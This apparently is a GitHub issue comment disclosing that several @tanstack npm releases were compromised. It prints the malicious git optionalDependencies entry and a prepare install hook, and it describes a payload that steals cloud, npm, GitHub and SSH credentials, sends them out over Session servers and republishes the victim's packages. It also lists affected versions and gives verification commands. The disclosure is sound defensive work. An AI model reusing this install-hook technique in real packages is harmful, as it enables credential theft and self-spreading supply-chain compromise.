I believe this report is correct. I've personally verified it on the /history package. I reported this package to NPM directly a few minutes before this issue was raised.

The specific malware fingerprint is whether a published version's package.json contains:

"optionalDependencies": {
  "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}

This will cause npm, on npm install, to resolve the git dependency by fetching the tanstack/router repo at commit 79ac49ee. That commit is an orphan commit pushed to a fork in order to be somewhat hidden. Because npm treats git dependencies as "build from source," it installs that commit's declared dependencies (which include bun) and then runs its prepare lifecycle script:

"scripts": { "prepare": "bun run tanstack_runner.js  && exit 1" }

(The entry is under optionalDependencies and ends in && exit 1 so the install of @tanstack/setup "fails" after the script runs, so npm silently discards it.)

That script executes the ~2.3 MB obfuscated router_init.js file that is smuggled into each affected tarball (at the package root, not listed in the package's "files" array, and not referenced by any other file). Based on decoding the obfuscated string table, it appears to:

harvest credentials from common locations: AWS IMDS / Secrets Manager, GCP metadata, Kubernetes service-account tokens, Vault tokens, ~/.npmrc, GitHub tokens, SSH keys
exfiltrate over the Session/Oxen messenger file-upload network (filev2.getsession.org, seed{1,2,3}.getsession.org). This is a full E2E-encrypted dead-drop, so there is no attacker-controlled C2 to block
enumerate packages the victim maintains (registry.npmjs.org/-/v1/search?text=maintainer:…) and republish them with the same injection

I have confirmed @tanstack/history@1.161.12 contains this fingerprint and the payload file. For the remaining packages I checked only the registry manifest for the optionalDependencies entry, not the full payload. I believe the following are affected (two versions each, published ~19:20 and ~19:26 UTC today; the second is currently latest):

package	first bad version	second bad version (`latest`)
`@tanstack/history`	1.161.9	1.161.12
`@tanstack/router-utils`	1.161.11	1.161.14
`@tanstack/router-core`	1.169.5	1.169.8
`@tanstack/router-devtools-core`	1.167.6	1.167.9
`@tanstack/react-router-devtools`	1.166.16	1.166.19
`@tanstack/router-generator`	1.166.45	1.166.48
`@tanstack/virtual-file-routes`	1.161.10	1.161.13
`@tanstack/router-plugin`	1.167.38	1.167.41
`@tanstack/react-router`	1.169.5	1.169.8
`@tanstack/router-devtools`	1.166.16	1.166.19
`@tanstack/react-start`	1.167.68	1.167.71
`@tanstack/router-cli`	1.166.46	1.166.49
`@tanstack/router-vite-plugin`	1.166.53	1.166.56
`@tanstack/solid-router`	1.169.5	1.169.8

As of my last check, @tanstack/start, @tanstack/query*, @tanstack/table*, @tanstack/form*, @tanstack/virtual*, and @tanstack/store did not carry the fingerprint.

The _npmUser on the malicious versions shows they were published through the GitHub Actions OIDC trusted-publisher config. That suggests the publish workflow itself is compromised, not just a token; rotating npm tokens alone likely won't stop republication until the workflow/OIDC binding is disabled.

To verify these claims, you can run

npm pack @tanstack/<pkg>@<version>   # does NOT run install scripts
tar -xzf *.tgz
cat package/package.json | grep -A3 optionalDependencies
ls -la package/router_init.js

Uh oh!

Several npm latest releases were compromised #7383

Description

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions